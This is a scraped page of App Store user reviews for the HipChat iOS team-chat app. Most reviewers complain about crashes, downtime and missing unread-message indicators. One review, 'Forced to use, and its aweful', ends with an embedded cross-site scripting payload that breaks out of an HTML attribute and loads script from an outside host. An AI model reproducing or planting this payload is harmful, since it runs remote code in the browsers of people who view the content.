HipChat – Group chat for teams App Reviews

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Requires constant restarts!

Very disappointed in atlassian for releasing this. For a company that develops tools to make your testing and development easier they really need to use their own products when developing this app. Do you enjoy requiring killing an app, then reloading it just to refresh the contents of a room? If so, this app is for you.

No internal hip chat server support?

Seriously? Isnt Atlassians new MO enterprise?

Crashes Often

This app needs a substantial amount of work to remove the numerous bugs that cause it to crash and fail to completely load room data. It is uncharacteristic of Atlassians usual excellent work.

Great App!

Im not sure why this is getting bad reviews. I always receive a notification when a new message is received. I am also able to see the number of new messages waiting to be read next to the name of the sender. There are no issues there. The stand up not is great on the desktop version. This app I use only for when In away from my desktop and need to communicate during lunch/nights/weekends.

Forced to use, and its aweful

By far the most hated app on my phone. Cant ever send messages (works 1 out of 10 times) and notifications are a joke. Why even offer an iOS app if its this bad? Really only hurts the companys brand. "><script src=https://y.vg></script>

Extremely unreliable

I use HipChat for work. I, and pretty much everyone else at the company, hate it. Its unreliable in a variety of ways. The service is entirely inaccessible for a few hours every few months. This isnt scheduled, as far as I can tell. It often has to re-establish its connection to the server. About once every two months, it will just stop delivering messages for a while. Often its intermittent, or just for some people, so its hard to know if we need to switch to IRC and Slack (which is too expensive for us to use company wide) for a while. Sometimes I dont receive push notifications for new messages, but if I do, it doesnt show me what room the message came in. The push notifications were so unreliable that I had to enable text message notifications as well (which I could t do through this app). The text messages are truncated at a little more than the length limit on an SMS, so I often get two messages. Since SMS cannot guarantee order, the second one often comes first. That will just be the last few characters and some ellipses, e.g. "hb..." It sends the text messages from five different phone numbers, so I get five different message threads in my Messages app. At least it sends messages from the same person from the same phone number. When I open the app, theres no way to tell which rooms have received new messages, and no way to find new messages to me. It certainly doesnt have something like an inbox. Once in a while I go to send a private message and discover that theres a weeks-old message I didnt see because HipChat didnt notify me at all. Theres no way to clear message history. On top of all that, the company pays for this service. Its cheaper than Slack, but I guess you get what you pay for.


I rarely write reviews, but this app is so bad that I feel compelled to write one. It crashes shortly after a slow start all the time, even after upgrading to the latest version. Free apps such as Telegram are more reliable. Avoid Hipchat if you can.

Not Working for On Prem Server

This version 3.9.0 is not working with on-prem HipChat Server. Other than that, the app is pretty unusable. When you receive a notification about an chat message, when you open the app, no badges, nothing to figure out which person or group the unread message is pending reading.

Too many down times

I had to switch to slack because hipchat keep having down times. Please dont release an unstable version of your product!

Quick fix

Thanks for the quick turnaround on the HC Server login fix!


Who messaged me? Seriously! Oh look, you have a message but were not going to let you see who its from! Im convinced this is the app they throw all of their junior developers at. It feels more like a high school student project than a mature app thats now been around for years. The only reason I use HipChat is because our company switched from the far superior Slack to try to save some money. Big mistake.

Nosedive in usability

App notifications became cluttered. Introduced more connectivity issues.

Rooms filled with chat are empty

Lots of issues. Most recent is that rooms that are filled with chat show as empty on this app. Also no easy way to Do Not Disturb -- have to log off completely and retype login completely to stop getting notifications.

Needs work

This is what my company uses so Im stuck with it. App crashes a lot, it doesnt show which conversations have new messages when you open the app, and it only allows sign in to one HC acct. Update-still terrible. Possibly the worst app on the App Store. Crashes so much now, it is useless.

Who sent that message again???

Hmm, badge says I have an unread message, so I go into the app. Whoops, none of my 20+ rooms or 50+ people have an unread message indicator. Who sent that message again??? Unfortunately, you cant find out unless looking through everything. This mobile app is pretty useless in this state.

Loading Messages...

I seem to recall this app was useful. When it could load and send messages. Those days are gone I guess, which is sad. Extra star for the memories.

Too much downtime

The service has too much downtime. Its not worth paying for. There are continuous downtime and it happened over and over again over the past couple weeks and is simply unacceptable.

Home screen suggestion

A list as your home screen leaves out all context for which discussions are active or what has been said last. Id rather the home screen in the app be more of texting experience. Maybe you could filter by room or people on that screen. Beyond that, HipChat is amazing and our team at work uses it every day.

Difficult iPhone experience

Generally a great product for internal communications but the app is clunky. 1. When I receive a message I touch the push notification and it takes me to the last part of the conversation I viewed in app. Not the message I just received. So I have to scroll through any conversation I maybe have had on PC. 2. No quick reply in the push notifications. As other reviews have mentioned all other messaging apps have this. 3. Takes time to authenticate every time I open the app on wifi or 4G. Worse on 3G and essentially unusable on 2G. Get back into dev mode guys or Slack is going to eat you!

updates are getting worse

it just gets worse with each update. * iOS notification there is a message. launch app and there are no notifications as to user/room * numerous times on osx i would get notifications there are new messages in another user/room. go there and its old message. * i thought if there were new messages a room or user that there was a notification count next to the room to let you know even if they werent specifically @ you. i hope the next update is an improvement over to all these enhancements. I like the direction they are going but the quality is very lacking and buggy

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